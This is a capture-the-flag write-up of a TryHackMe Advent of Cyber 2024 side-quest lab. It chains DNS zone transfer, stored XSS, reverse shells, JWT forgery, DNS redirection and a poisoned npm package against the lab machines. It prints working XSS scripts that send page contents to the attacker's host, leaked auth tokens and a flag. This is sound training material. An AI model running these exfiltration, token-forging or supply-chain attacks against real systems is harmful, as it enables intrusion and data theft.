TryHackMe AoC 2024 Side Quest: T5: An Avalanche of Web Apps (Part 1)

Within Day 19, the last question for the game hacking section says:



We start a Python server on the VM so we can pull down the game file to our machine



Running strings we see this:







Loading up Binary Ninja, if we do a Ctrl + F search for keycard, we see an interesting function

I might have to pivot over to Ghidra. Binary Ninja doesn’t seem to resolve anything here, but it’s obviously a function for something









We missed a few folders in our initial wget download



I think we are still missing something: the .so folder contains only JavaScript files







If we run a find command, we see the actual .so file

We can wget this

After importing this file into Ghidra and clicking on create_keycard, off to the right we see an interesting nested condition

one_two_three_four_five



I wasn’t sure how to build a script and use this password to move forward, so I needed help from a walk-through

Running the script produces a zip file

Now we will exit out of frida and set up our Python server so we can pull down the zip to our Kali machine



Using the password we found (where_is_the_yeti) we are able to unlock the zip



We have our keycard password

Keycard: five_five_five_five_five

***Unfortunately, both Part 1 and Part 2 are a bit scattered. There are a lot of things I tried that only partially worked, so please read through everything carefully: if you get stuck, I probably mention how to get unstuck later on***









The standard port of 21337 unlocks the VM FW







Running a rustscan, we find 3 open ports



Browsing to the IP, we have to add the domain to our hosts file



Browsing to the domain, we have a bare page

We are either going to find sub-directories or sub-domains





Using the small wordlist doesn’t find anything unfortunately







We will use dig to look for DNS Zone Transfers

hostmaster.bestfestivalcompany.thm

adm-int.bestfestivalcompany.thm



thehub-uat.bestfestivalcompany.thm

npm-registry.bestfestivalcompany.thm



thehub-int.bestfestivalcompany.thm
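Since the zone transfer output only survives as screenshots here, the following is a minimal sketch of how the hostnames and IPs could be pulled out of saved dig output. It assumes the usual `name TTL IN A address` layout of dig answer lines. The sample text is illustrative only: the thehub-uat address is the one used later in this write-up, while `example-host`, `192.0.2.10`, and the TTL are placeholders, not real records from the room.

```python
import re

# Matches answer lines of the form: name.  TTL  IN  A|CNAME  target
RECORD = re.compile(r"^(\S+)\s+\d+\s+IN\s+(A|CNAME)\s+(\S+)$")


def parse_axfr(dig_output: str) -> dict[str, str]:
    """Map each hostname found in dig's answer lines to its A/CNAME target."""
    records = {}
    for line in dig_output.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue  # skip blank lines and dig's own comment lines
        match = RECORD.match(line)
        if match:
            name, _rtype, target = match.groups()
            records[name.rstrip(".")] = target.rstrip(".")
    return records


# Illustrative input only; the real records are in the screenshots.
sample = """\
; saved output of a zone transfer attempt (placeholder header line)
thehub-uat.bestfestivalcompany.thm.\t600\tIN\tA\t172.16.1.3
example-host.bestfestivalcompany.thm.\t600\tIN\tA\t192.0.2.10
"""
print(parse_axfr(sample))
```

Keeping the result as a hostname-to-IP mapping makes it easy to refer back to the internal addresses later, once we are inside the container network.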

IPs to take note of: 172.16.1.2 and 172.16.1.3

Of the 5 sub-domains, only 3 redirect to a new page





Using xsser against the Contact Us section, we are missing some needed data



I tested the above tool, but it couldn’t find an injection point, so I resorted to manual testing





I ended up changing the port it was listening on to 80 (which means the port isn’t needed in the above screenshot)

The callback seems unreliable, so if the Python server doesn’t catch it initially, just keep trying

The request runs every minute, but our script isn’t triggering

async function exfil() {

const response = await fetch('/');

const text = await response.text();

await fetch(`http://<kali ip>/?data=${btoa(text)}`);

}

exfil();

Kudos for the script and other assistance go to the following write-up

Modifying the script slightly and changing the ` to ‘ doesn’t seem to help either

Since something was obviously still wrong, I asked ChatGPT to help add some logging so I could see how far into the script the execution was getting. Unfortunately, I did not get any different results. The modified script is below

// Create a function to send log data to the external server

async function sendLog(data) {

await fetch(`http://<kali tun0 ip>/?log=${encodeURIComponent(data)}`);

}

async function exfil() {

// Send initial log to server to confirm the script is running

await sendLog('Script is running...');

const response = await fetch('/xss.js');

const text = await response.text();

// Send the raw text content (or an error if no content is fetched)

if (text) {

const encodedData = btoa(text);

await sendLog(`Encoded Data: ${encodedData}`); // Send Base64 data to the server

await fetch(`http://<kali tun0 ip>/?data=${encodedData}`);

} else {

await sendLog('No content fetched or empty response');

}

}

// Execute the exfil function

exfil();

Today, it seems like it wants to play nice



The script I used:

async function exfil() {

const response = await fetch('/');

const text = await response.text();

await fetch(`http://<kali ip>/?data=${btoa(text)}`);

}

exfil();









If we run echo '<the base64 text>' | base64 -d, we get the decoded response
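The same decoding step can be sketched in Python, which is handy when the Base64 blob is too long to paste comfortably into a terminal. This is a minimal sketch, assuming the request path is copied from the Python server log (for example `/?data=...`). The function name `decode_exfil` is made up for illustration.

```python
import base64
from urllib.parse import parse_qs, urlsplit


def decode_exfil(request_path: str) -> str:
    """Decode the Base64 `data` parameter from a logged request path."""
    query = urlsplit(request_path).query
    values = parse_qs(query).get("data")
    if not values:
        raise ValueError("no data parameter found in the request path")
    # btoa() output is not URL-encoded, so any '+' arrives as a space.
    b64 = values[0].replace(" ", "+")
    # Restore padding in case the trailing '=' characters were cut off.
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-8", errors="replace")


# Round-trip example with a made-up page body.
example_path = "/?data=" + base64.b64encode(b"<h1>hello</h1>").decode()
print(decode_exfil(example_path))
```

The `+` handling matters because the exfil script puts the raw `btoa()` output straight into the query string, where a `+` is read back as a space.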

I keep copying and modifying the new version out of concern that because the previous version got called earlier, a modified version might break

The script:

async function exfil() {

const response = await fetch('/wiki');

const text = await response.text();

await fetch(`http://<kali ip>/?data=${btoa(text)}`);

}

exfil();

The script:

async function exfil() {

const response = await fetch('/wiki/new');

const text = await response.text();

await fetch(`http://<kali ip>/?data=${btoa(text)}`);

}



exfil();This one, we see a POST request to wiki



The next script is as follows (when copy/pasting, the indentations are tabs and not individual spaces):

async function exfil() {

const response = await fetch('/wiki', {

method: "POST"

});

const text = await response.text();

await fetch(`http://<kali ip>/?data=${btoa(text)}`);

}

exfil();







We need to hop over to the npm-registry





/app/bfc_thehubint/node_modules/markdown-converter/index.js



We notice the author is mcskidy, so let’s download it



It downloads as a .tgz file

Per ChatGPT

This code converts markdown content into HTML and can dynamically execute

JavaScript code within the markdown using a sandbox environment. Let’s

break it down:

1. Markdown to HTML Conversion:

The function markdownToHtml takes in markdown text and transforms it into

HTML elements. It uses regular expressions (replace()) to match common

markdown syntax and replace it with corresponding HTML tags:

# -> <h1> (for main headings)

## -> <h2> (for subheadings)

### -> <h3> (for further subheadings)

* -> <li> (for bullet points)

** -> <b> (for bold)

* -> <i> (for italic)

2. Dynamic Code Execution:

The function also looks for parts of the markdown surrounded by {{ ... }}

(i.e., dynamic code). It treats this as JavaScript code and executes it:

The regular expression \{\{(.*?)\}\} captures the content inside the double

curly braces.

If dynamic code is found, it runs it in a secure, isolated environment

using Node.js's vm.runInNewContext().

A "sandbox" context is created, which includes any provided context

(variables or functions) and the require function.

The code is executed in the sandbox to avoid interacting with the global

environment, providing some level of isolation.

3. Error Handling:

If an error occurs when executing the dynamic code, the function catches

the error and returns a red-colored error message in the HTML output.

4. Use Case:

This function could be used in a web application or documentation platform

that allows users to write in markdown, but also want to include dynamic,

executable content (like JavaScript) embedded in their markdown.

Potential Risks:

Since this code executes JavaScript from markdown (which could be

user-generated), it has significant security implications:

Code injection vulnerability: Malicious users could inject harmful

JavaScript, leading to server compromise, privilege escalation, or

unauthorized actions.

Sandboxing concerns: Even though the code uses vm.runInNewContext()

to isolate the environment, there could still be potential risks,



depending on the context and the objects available in the sandbox.Finally time for 1 of many reverse shells (the code is in the walk-through above and at the bottom of this article as well) — Medium breaks (does like the shell, hence why it’s not copy/pasted here)
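Before building the payload, it can help to check which parts of a wiki entry the converter would treat as dynamic code. The sketch below reuses the `\{\{(.*?)\}\}` pattern quoted in the ChatGPT summary. It is a Python approximation for checking payload text, not the package's actual code, and the sample markdown is made up.

```python
import re

# Same non-greedy pattern the summary quotes for the converter.
DYNAMIC = re.compile(r"\{\{(.*?)\}\}")


def dynamic_expressions(markdown: str) -> list[str]:
    """Return the expressions found between {{ and }} in the markdown."""
    return [expr.strip() for expr in DYNAMIC.findall(markdown)]


sample = "# Title\nTotal: {{ 1 + 1 }} and {{ context.user }}"
print(dynamic_expressions(sample))
# prints ['1 + 1', 'context.user']
```

With this pattern, `.` does not match a newline, so an expression split across lines is not picked up. Assuming the package uses the regex without extra flags, the payload should stay on a single line.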

The indentations are tabs



Same as before, within the Contact Us page, use the following XSS

<script src="http://<kali ip>/reverse.js"></script>

This will call the script from the Python server, and shell.js will call index.html (both have to be in the same folder as the Python server) to get the reverse shell



What is the value of flag 1?

Answer: THM{09a3f8918a32ea38a2c833c98214336a}

When stabilizing the shell, there might be extra characters printed after you get the initial shell via netcat. Just delete everything up to the #



Let’s see what this start.sh script is



We are root, but probably stuck in a container considering all of the different IPs from our dig command

We can’t SSH in (even with adding our pub key to authorized_keys)













Catting the .npmrc file, we have an auth token

//npm-registry.bestfestivalcompany.thm:4873/:_authToken=OWI1MmY3MzA0MDEyZmVkYTIwMzdjMTZmZDhjZjA1ZmQ6OGJiNjQxM2Y0NDYzZDZiMGRiMWI2NGY2ZjhkOWU2OWJlNTk0M2VkNzg5OTU5NDM2NjkyMDdm





registry=http://npm-registry.bestfestivalcompany.thm:4873/

Within /app we see the following



Navigating through, we find a .git repo

Let’s cat those 3 other files





Since the .git folder is hidden, we will tar the entire assets directory so we can then transfer it to our local machine

Now we are going to move the tar file into the assets folder



Then on a different terminal, all we have to do is run wget to grab our file





Now, with it on our host Kali machine, we will untar it



Now we are able to successfully inspect the .git folder

Let’s run git log to check out what commits happened



Based on the middle commit message about issues with the backup directory, we will check out the commit prior to that



We find an SSH key

In order to SSH in, we need to add the root domain: bestfestivalcompany.thm to our hosts file. Also chmod 600 the backup.key file



The walk-through basically says that you can create a variable holding the ssh command in quotes and follow it with git clone. That didn’t work for me

Here’s what did work to clone the admdev and admint repos to our local machine

- Create a config file (if it doesn’t exist; do not add a file extension) in /home/<user>/.ssh/

- Add the following lines (the indentations are a single tab)

Host gitserv

Hostname bestfestivalcompany.thm

Identityfile <full path to>/assets/assets/backups/backup.key

IdentitiesOnly yes

AddKeysToAgent yes





Then all we have to do is as follows:

git clone git@gitserv:admdev.git

git clone git@gitserv:admint.git





Code within admint

const express = require('express');

const bodyParser = require('body-parser');

const jwt = require('jsonwebtoken');

const axios = require('axios');

const RemoteManager = require('bfcadmin-remote-manager');

const fs = require('fs');

const { JWK } = require('node-jose');

const app = express();

const PORT = 3000;

app.use(bodyParser.json());

app.use(bodyParser.urlencoded({ extended: true }));

let JWKS = null;

// Fetch JWKS

async function fetchJWKS() {

try {

console.log('Fetching JWKS...');

const response = await axios.get('http://thehub-uat.bestfestivalcompany.thm:3000/jwks.json');

const fetchedJWKS = response.data;

if (validateJWKS(fetchedJWKS)) {

JWKS = fetchedJWKS;

console.log('JWKS validated and updated successfully.');

} else {

console.error('Invalid JWKS structure. Retaining the previous JWKS.');

}

} catch (error) {

console.error('Failed to fetch JWKS:', error.message);

}

}

// Validate JWKS

function validateJWKS(jwks) {

if (!jwks || !Array.isArray(jwks.keys) || jwks.keys.length === 0) {

return false;

}

for (const key of jwks.keys) {

if (!key.kid || (!key.x5c && (!key.n || !key.e))) {

return false;

}

}

return true;

}

// Periodically fetch JWKS every 1 minute

setInterval(fetchJWKS, 60 * 1000);

fetchJWKS();

// Middleware to ensure JWKS is loaded

function ensureJWKSLoaded(req, res, next) {

if (!JWKS || !JWKS.keys || JWKS.keys.length === 0) {

return res.status(503).json({ error: 'JWKS not available. Please try again later.' });

}

next();

}

// Middleware to authenticate JWT

async function authenticateToken(req, res, next) {

const token = req.headers.authorization?.split(' ')[1];

if (!token) return res.status(401).json({ error: 'Unauthorized' });

try {

const key = JWKS.keys[0];

let publicKey;

if (key?.x5c) {

publicKey = `-----BEGIN CERTIFICATE-----\n${key.x5c[0]}\n-----END CERTIFICATE-----`;

} else if (key?.n && key?.e) {

const rsaKey = await JWK.asKey({

kty: key.kty,

n: key.n,

e: key.e,

});

publicKey = rsaKey.toPEM();

} else {

return res.status(500).json({ error: 'Public key not found in JWKS.' });

}

jwt.verify(token, publicKey, { algorithms: ['RS256'] }, (err, user) => {

if (err || user.username !== 'mcskidy-adm') {

return res.status(403).json({ error: 'Forbidden' });

}

req.user = user;

next();

});

} catch (error) {

res.status(500).json({ error: 'Failed to authenticate token.', details: error.message });

}

}

// SSH configuration

const sshConfig = {

host: '', // Supplied by the user in API requests

port: 22,

username: 'root',

privateKey: fs.readFileSync('./root.key'),

readyTimeout: 5000,

strictVendor: false,

tryKeyboard: true,

};

// Restart service

app.post('/restart-service', ensureJWKSLoaded, authenticateToken, async (req, res) => {

const { host, service } = req.body;

if (!host || !service) {

return res.status(400).json({ error: 'Missing host or serviceName value.' });

}

try {

const manager = new RemoteManager({ ...sshConfig, host });

const output = await manager.restartService(service);

res.json({ message: `Service ${service} restarted successfully`, output });

} catch (error) {

res.status(500).json({ error: 'Failed to restart service', details: error.message });

}

});

// Modify resolv.conf

app.post('/modify-resolv', ensureJWKSLoaded, authenticateToken, async (req, res) => {

const { host, nameserver } = req.body;

if (!host || !nameserver) {

return res.status(400).json({ error: 'Missing host or nameserver value.' });

}

try {

const manager = new RemoteManager({ ...sshConfig, host });

const output = await manager.modifyResolvConf(nameserver);

res.json({ message: 'resolv.conf updated successfully', output });

} catch (error) {

res.status(500).json({ error: 'Failed to modify resolv.conf', details: error.message });

}

});

// Reinstall Node.js modules

app.post('/reinstall-node-modules', ensureJWKSLoaded, authenticateToken, async (req, res) => {

const { host, service } = req.body;

if (!host || !service) {

return res.status(400).json({ error: 'Missing host or service value.' });

}

try {

const manager = new RemoteManager({ ...sshConfig, host });

const output = await manager.reinstallNodeModules(service);

res.json({ message: `Node modules reinstalled successfully for service ${service}`, output });

} catch (error) {

res.status(500).json({ error: 'Failed to reinstall node modules', details: error.message });

}

});

// Start server

app.listen(PORT, () => {

console.log(`Server running on http://localhost:${PORT}`);

});

Near the top, we see:









Catting that json file from our active remote shell

{"keys": [{

"kty": "RSA",

"e": "AQAB",

"use": "sig",

"kid": "FdIGp1xoPOzfAm/9qZgMPIBI7rk=",

"alg": "RS256",

"n": "hoGPOfw_tnBttFdk_RSrl_9glQGFwemyM17SPYwnQNAu_IAYkbvy8Z2UKEKY4Ve5oFwJA0InMhJKMLs434T_5BkJJeAUCI7IMcxY4z_8YPyrqxEnCohusbdrOJUh0o4bLZK7lL3zcbCQNY5tTbHoMpkPb_EOqU3h99H0f5L8JUQN0rnRP7YYTqDYBaRUmrOl8I3JbBkKR0ISIfURVoV71bTw5jufBtJi057qRjH1A9gpyQVbeaGv_bquJsRkzbvm-c31XKJGL14_pcCwSn6LAw_M7PSauJrIRjYXhRrB9fImwzv6EqPF5P_zmhSfLFJ4N6CDXkkTQWgiur_ZBDqy8w"

}]}

Catting the /etc/hosts file, we can see that our hostname matches the 172.16.1.3 IP

Scrolling back up to the dig output, this is where the IPs come in handy



Uploading nmap and untarring it, we see port 3000 running on 172.16.1.2





We can likely set this up with Chisel and Proxychains, but we are going to use an easier tool (mentioned in the walk-through at the end)

Within the releases we need:

ligolo-ng_agent_0.7.3_linux_amd64.tar.gz

ligolo-ng_proxy_0.7.3_linux_amd64.tar.gz

We’ll extract them using: tar -xzf <file name>

Now we need to run 4 commands on our Kali machine:

sudo ip tuntap add user <your username> mode tun ligolo

sudo ip link set ligolo up

sudo ip route add 240.0.0.1 dev ligolo

sudo ip route add 172.16.1.0/24 dev ligolo

Now we start the proxy via: ./proxy -selfcert



Next upload the agent to the /app folder on the remote system

Next chmod +x agent

Then run: ./agent -connect <Kali IP>:<ligolo port from ./proxy> --ignore-cert

Once this command is run, hopping over to the other terminal where the proxy is running, we see the agent has connected



Within the proxy ligolo terminal, type in session, press Enter, then type in start and press Enter





Now we launch Burp, turn on FoxyProxy, start the Intercept, and browse to the following URL



Within Burp, we see the following:

We’ll send this to Repeater







We are going to create a POST request to see if we can restart the service

The updated POST request

Once we send off the request, we get an Unauthorized error, which makes sense since we are not authenticating as mcskidy-adm (you need to keep lines 11 and 12 blank, i.e. don’t delete them, or the request won’t work)





We’ll install the following Burp Extension from the BApp Store







We’ll create a new RSA key

We will enter the ID from the jwks.json file, and click Generate



After clicking Generate, we have the following output:

It would be useful to save this data to a text file, just in case, before clicking OK

Now we need another BApp Store Extension



We need to stop our proxy via Ctrl + C so we can edit the jwks.json file within /app/bfc_thehubuat/assets

Since we don’t have nano, we can delete the file and upload a new version. So we will copy the data into a new file on Kali named jwks.json

We’ll replace the e and n values from the RSA key we generated earlier
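Before uploading the edited file, it can save a round trip to confirm it still passes the structural checks that validateJWKS() performs in the admint code above. The following is an approximate Python port of those checks, not the server's own code. The key values in the example are placeholders, and `validate_jwks` is a name chosen for this sketch.

```python
def validate_jwks(jwks) -> bool:
    """Approximate port of validateJWKS() from the admint index.js."""
    if not isinstance(jwks, dict):
        return False
    keys = jwks.get("keys")
    if not isinstance(keys, list) or len(keys) == 0:
        return False
    for key in keys:
        if not isinstance(key, dict):
            return False
        has_cert = bool(key.get("x5c"))
        has_rsa = bool(key.get("n")) and bool(key.get("e"))
        # Every key needs a kid plus either a certificate or an n/e pair.
        if not key.get("kid") or not (has_cert or has_rsa):
            return False
    return True


# Placeholder values; substitute the n and e from the generated RSA key.
candidate = {"keys": [{"kty": "RSA", "kid": "<kid>", "n": "<n>", "e": "AQAB"}]}
print(validate_jwks(candidate))
```

If the check fails on the server side, the admint code logs that it is retaining the previous JWKS, so a malformed upload would be ignored rather than cause a visible error.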

Now we can remove the jwks.json file from /assets, upload our version via wget, and restart the proxy and agent applications



Something is wrong, so we will use the jwtgen.py script to generate a jwks.json file. When running it, we received the following error:

I had ChatGPT fix it. Its explanation of why the original code was broken:

The error you’re encountering is due to trying to hash the RSAPublicKey object directly, which is not hashable. The hash() function cannot be applied to complex objects like cryptographic key objects.

To resolve this, you should convert the public key to a format that is hashable (e.g., by converting it to a string or bytes before hashing). A common approach is to serialize the public key to a PEM format or extract its modulus (n) and exponent (e) and hash those.

Here’s how you can fix the issue:

Modify the generate_jwks function:

Instead of using hash(public_key), serialize the public key to PEM format or use its components (n and e) directly for generating the kid:

# Export the public key in JWKS format

def generate_jwks(public_key):

public_numbers = public_key.public_numbers()

e = base64.urlsafe_b64encode(public_numbers.e.to_bytes(3, byteorder='big')).decode('utf-8').rstrip("=")

n = base64.urlsafe_b64encode(public_numbers.n.to_bytes((public_numbers.n.bit_length() + 7) // 8, byteorder='big')).decode('utf-8').rstrip("=")

# Create kid based on a unique and deterministic identifier

public_key_pem = public_key.public_bytes(

encoding=serialization.Encoding.PEM,

format=serialization.PublicFormat.SubjectPublicKeyInfo

)

kid = base64.urlsafe_b64encode(public_key_pem).decode('utf-8').rstrip("=")

jwk = {

"keys": [

{

"kty": "RSA",

"e": e,

"use": "sig",

"kid": f"sig-{kid}",

"alg": "RS256",

"n": n

}

]

}

return jwk

Explanation:

- public_key.public_bytes() serializes the public key into PEM format.

- Then, we encode the PEM data as a URL-safe base64 string to generate a kid.

This way, the kid becomes a unique identifier derived from the public key, and the error will be resolved.

The following is the fully updated code:

import jwt

import json

import base64

from cryptography.hazmat.primitives.asymmetric import rsa

from cryptography.hazmat.primitives import serialization

# Generate RSA key pair

def generate_rsa_key():

private_key = rsa.generate_private_key(

public_exponent=65537,

key_size=2048

)

public_key = private_key.public_key()

return private_key, public_key

# Export the public key in JWKS format

def generate_jwks(public_key):

public_numbers = public_key.public_numbers()

e = base64.urlsafe_b64encode(public_numbers.e.to_bytes(3, byteorder='big')).decode('utf-8').rstrip("=")

n = base64.urlsafe_b64encode(public_numbers.n.to_bytes((public_numbers.n.bit_length() + 7) // 8, byteorder='big')).decode('utf-8').rstrip("=")

# Create kid based on a unique and deterministic identifier

public_key_pem = public_key.public_bytes(

encoding=serialization.Encoding.PEM,

format=serialization.PublicFormat.SubjectPublicKeyInfo

)

kid = base64.urlsafe_b64encode(public_key_pem).decode('utf-8').rstrip("=")

jwk = {

"keys": [

{

"kty": "RSA",

"e": e,

"use": "sig",

"kid": f"sig-{kid}",

"alg": "RS256",

"n": n

}

]

}

return jwk

# Generate a JWT

def generate_jwt(private_key, payload, kid):

headers = {

"alg": "RS256",

"typ": "JWT",

"kid": kid

}

token = jwt.encode(payload, private_key, algorithm="RS256", headers=headers)

return token

# Main logic

if __name__ == "__main__":

private_key, public_key = generate_rsa_key()

# Serialize private key for signing

private_key_pem = private_key.private_bytes(

encoding=serialization.Encoding.PEM,

format=serialization.PrivateFormat.PKCS8,

encryption_algorithm=serialization.NoEncryption()

)

# Generate JWKS

jwks = generate_jwks(public_key)

print("JWKS:")

print(json.dumps(jwks, indent=4))

# Generate JWT

payload = {

"username": "mcskidy-adm"

}

kid = jwks["keys"][0]["kid"]

jwt_token = generate_jwt(private_key_pem, payload, kid)

print("\nAuthorization Header:")

print(f"Bearer {jwt_token}")


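To sanity-check the token the script prints, we can decode its header and payload locally. Going by the admint code above, authenticateToken verifies against the first key in the JWKS and requires the username claim to be mcskidy-adm, so the payload is the part worth checking. This is a minimal sketch using only the standard library. It does not verify the signature, and `peek_jwt` is a made-up helper name.

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring any stripped padding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def peek_jwt(token: str) -> tuple[dict, dict]:
    """Return (header, payload) WITHOUT verifying the signature."""
    token = token.strip().removeprefix("Bearer ").strip()
    header_b64, payload_b64, _signature = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    return header, payload


def _encode(obj: dict) -> str:
    """Build an unsigned demo segment (for the example only)."""
    raw = json.dumps(obj).encode("utf-8")
    return base64.urlsafe_b64encode(raw).decode("ascii").rstrip("=")


# Demo token with a dummy signature, just to show the round trip.
demo = "Bearer " + ".".join(
    [_encode({"alg": "RS256", "typ": "JWT"}), _encode({"username": "mcskidy-adm"}), "sig"]
)
print(peek_jwt(demo))
```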

Exit the proxy, modify the jwks.json file on Kali, delete the current jwks.json file within /app/bfc_thehubuat/assets on the remote server, upload the new jwks.json, and restart the proxy and agent



Resend a new GET request to: http://172.16.1.2:3000/restart-service

Modify it to a POST request like earlier, but add the Authorization: header with the Bearer token from the Python script output
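For anyone who prefers scripting over Repeater, the same request can be sketched with Python's standard library. The `host` and `service` field names come from the /restart-service handler in the admint code. The token, host, and service values below are placeholders, and the actual send is left commented out so the sketch does not touch the network.

```python
import json
import urllib.request


def build_restart_request(base_url: str, token: str, host: str, service: str):
    """Build the authenticated POST for the /restart-service endpoint."""
    body = json.dumps({"host": host, "service": service}).encode("utf-8")
    return urllib.request.Request(
        f"{base_url}/restart-service",
        data=body,
        method="POST",
        headers={
            "Content-Type": "application/json",
            # Pass the raw token here, without the "Bearer " prefix.
            "Authorization": f"Bearer {token}",
        },
    )


req = build_restart_request(
    "http://172.16.1.2:3000", "<token from the script>", "<target host>", "<service name>"
)
print(req.get_method(), req.full_url)

# To actually send it (requires the ligolo tunnel to be up):
# with urllib.request.urlopen(req, timeout=10) as resp:
#     print(resp.read().decode())
```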

This message shows that authentication was successful



Now we will install a DNS server using: sudo apt install dnsmasq

Now we will edit /etc/dnsmasq.conf and add the following:

auth-ttl=60

auth-zone=bestfestivalcompany.thm

auth-server=bestfestivalcompany.thm # this option is required depending on dnsmasq version

# Disable any DHCP functionality (DNS only)

no-dhcp-interface=

host-record=thehub-uat.bestfestivalcompany.thm,172.16.1.3

host-record=npm-registry.bestfestivalcompany.thm,<Kali IP>

# Enable logging for debugging purposes

log-queries

We can add this to the top of the file



When trying to restart the dnsmasq service after making the necessary modifications, we get some errors



Running: ss -lp "sport = :domain" we can see that systemd-resolve is already listening on the DNS port

We’ll stop it with: sudo systemctl stop systemd-resolved, then we can restart dnsmasq

We can verify all is set up correctly by running the following command and verifying that the first IP is the Kali IP

If we upload nmap and rerun a new scan, we see a few other ports

Going back to the admdev repo that we cloned earlier, we have a hidden file

Catting index.js, we see express



Cross-checking npm-registry for express, and looking at the Dependencies tab, we have multiple packages that don’t specify an exact version



We’ll download this package







Let’s extract the tar with: tar -xzf content-type-1.0.5.tgz



Within the package folder, this is the current version of index.js

Our modified index.js file that will curl our Kali IP



Now we need to modify package.json. The current contents:

Modified version:



Back in our shell, under /root is a .npmrc file

Catting this file, we have an auth token we need

:_authToken=OWI1MmY3MzA0MDEyZmVkYTIwMzdjMTZmZDhjZjA1ZmQ6OGJiNjQxM2Y0NDYzZDZiMGRiMWI2NGY2ZjhkOWU2OWJlNTk0M2VkNzg5OTU5NDM2NjkyMDdm

Now we will run npm config set with the auth token



Next we publish the package to the registry

Next set up a netcat listener on the port set within index.js

We first need to update the nameserver to our Kali IP



Now we verify we can reinstall the node modules

Since the errors aren’t normal (something is wrong), I took the 2 added lines out of index.js and put them in a new file called exploit.js. Then I made a modification at the bottom of the package.json file. The version at the top of package.json also needs to be increased.
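The package.json screenshots did not survive here, so the exact change is not reproduced. The sketch below shows one way the two edits (a version bump and an extra entry at the bottom) could be applied programmatically. The `preinstall` hook name and the `node exploit.js` command are assumptions, as is the `test` script in the sample manifest. Only the package name and the 1.0.5 version come from the tarball name above.

```python
import json


def bump_patch(version: str) -> str:
    """Increase the last component of a major.minor.patch version."""
    major, minor, patch = version.split(".")
    return f"{major}.{minor}.{int(patch) + 1}"


def patch_manifest(manifest: dict, hook: str, command: str) -> dict:
    """Return a copy of the manifest with a bumped version and an added script."""
    patched = dict(manifest)
    patched["version"] = bump_patch(manifest["version"])
    scripts = dict(manifest.get("scripts", {}))
    scripts[hook] = command  # hook name is an assumption, see above
    patched["scripts"] = scripts
    return patched


# Sample manifest; the scripts entry is hypothetical.
original = {"name": "content-type", "version": "1.0.5", "scripts": {"test": "mocha"}}
print(json.dumps(patch_manifest(original, "preinstall", "node exploit.js"), indent=2))
```

The version bump matters because the registry will not accept a publish over a version that already exists.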

Same error, something is still wrong
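The ECONNREFUSED in the output that follows means the registry hostname resolved, but nothing accepted the connection on port 4873. One possible cause, given that our dnsmasq config now points npm-registry at the Kali IP, is that nothing is listening on that port on Kali. This is a guess, not a confirmed diagnosis. A quick reachability check can be sketched like this (`port_open` is a made-up helper name):

```python
import socket


def port_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and unreachable hosts.
        return False


# Run on Kali: is anything listening where the container expects the registry?
print(port_open("127.0.0.1", 4873))
```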

"output":"npm error code ECONNREFUSED

npm error errno ECONNREFUSED

npm error FetchError: request to http://npm-registry.bestfestivalcompany.thm:4873/express failed, reason:

npm error at ClientRequest.<anonymous> (/usr/local/lib/node_modules/npm/node_modules/minipass-fetch/lib/index.js:130:14)

npm error at ClientRequest.emit (node:events:519:28)

npm error at _destroy (node:_http_client:880:13)

npm error at onSocketNT (node:_http_client:900:5)

npm error at process.processTicksAndRejections (node:internal/process/task_queues:83:21) {

npm error code: 'ECONNREFUSED',

npm error errno: 'ECONNREFUSED',

npm error type: 'system',

npm error requiredBy: '.'

npm error }

npm error

npm error If you are behind a proxy, please make sure that the

npm error 'proxy' config is set properly. See: 'npm help config'

npm error A complete log of this run can be found in: /root/.npm/_logs/2025-02-18T05_32_01_191Z-debug-0.log"

3280d14a60c5:/app# cat /usr/lib/node_modules/npm/node_modules/minipass-fetch/lib/index.js

'use strict'

const { URL } = require('url')

const http = require('http')

const https = require('https')

const zlib = require('minizlib')

const { Minipass } = require('minipass')

const Body = require('./body.js')

const { writeToStream, getTotalBytes } = Body

const Response = require('./response.js')

const Headers = require('./headers.js')

const { createHeadersLenient } = Headers

const Request = require('./request.js')

const { getNodeRequestOptions } = Request

const FetchError = require('./fetch-error.js')

const AbortError = require('./abort-error.js')

// XXX this should really be split up and unit-ized for easier testing

// and better DRY implementation of data/http request aborting

const fetch = async (url, opts) => {

if (/^data:/.test(url)) {

const request = new Request(url, opts)

// delay 1 promise tick so that the consumer can abort right away

return Promise.resolve().then(() => new Promise((resolve, reject) => {

let type, data

try {

const { pathname, search } = new URL(url)

const split = pathname.split(',')

if (split.length < 2) {

throw new Error('invalid data: URI')

}

const mime = split.shift()

const base64 = /;base64$/.test(mime)

type = base64 ? mime.slice(0, -1 * ';base64'.length) : mime

const rawData = decodeURIComponent(split.join(',') + search)

data = base64 ? Buffer.from(rawData, 'base64') : Buffer.from(rawData)

} catch (er) {

return reject(new FetchError(`[${request.method}] ${

request.url} invalid URL, ${er.message}`, 'system', er))

}

const { signal } = request

if (signal && signal.aborted) {

return reject(new AbortError('The user aborted a request.'))

}

const headers = { 'Content-Length': data.length }

if (type) {

headers['Content-Type'] = type

}

return resolve(new Response(data, { headers }))

}))

}

return new Promise((resolve, reject) => {

// build request object

const request = new Request(url, opts)

let options

try {

options = getNodeRequestOptions(request)

} catch (er) {

return reject(er)

}

const send = (options.protocol === 'https:' ? https : http).request

const { signal } = request

let response = null

const abort = () => {

const error = new AbortError('The user aborted a request.')

reject(error)

if (Minipass.isStream(request.body) &&

typeof request.body.destroy === 'function') {

request.body.destroy(error)

}

if (response && response.body) {

response.body.emit('error', error)

}

}

if (signal && signal.aborted) {

return abort()

}

const abortAndFinalize = () => {

abort()

finalize()

}

const finalize = () => {

req.abort()

if (signal) {

signal.removeEventListener('abort', abortAndFinalize)

}

clearTimeout(reqTimeout)

}

// send request

const req = send(options)

if (signal) {

signal.addEventListener('abort', abortAndFinalize)

}

let reqTimeout = null

if (request.timeout) {

req.once('socket', socket => {

reqTimeout = setTimeout(() => {

reject(new FetchError(`network timeout at: ${

request.url}`, 'request-timeout'))

finalize()

}, request.timeout)

})

}

req.on('error', er => {

// if a 'response' event is emitted before the 'error' event, then by the

// time this handler is run it's too late to reject the Promise for the

// response. instead, we forward the error event to the response stream

// so that the error will surface to the user when they try to consume

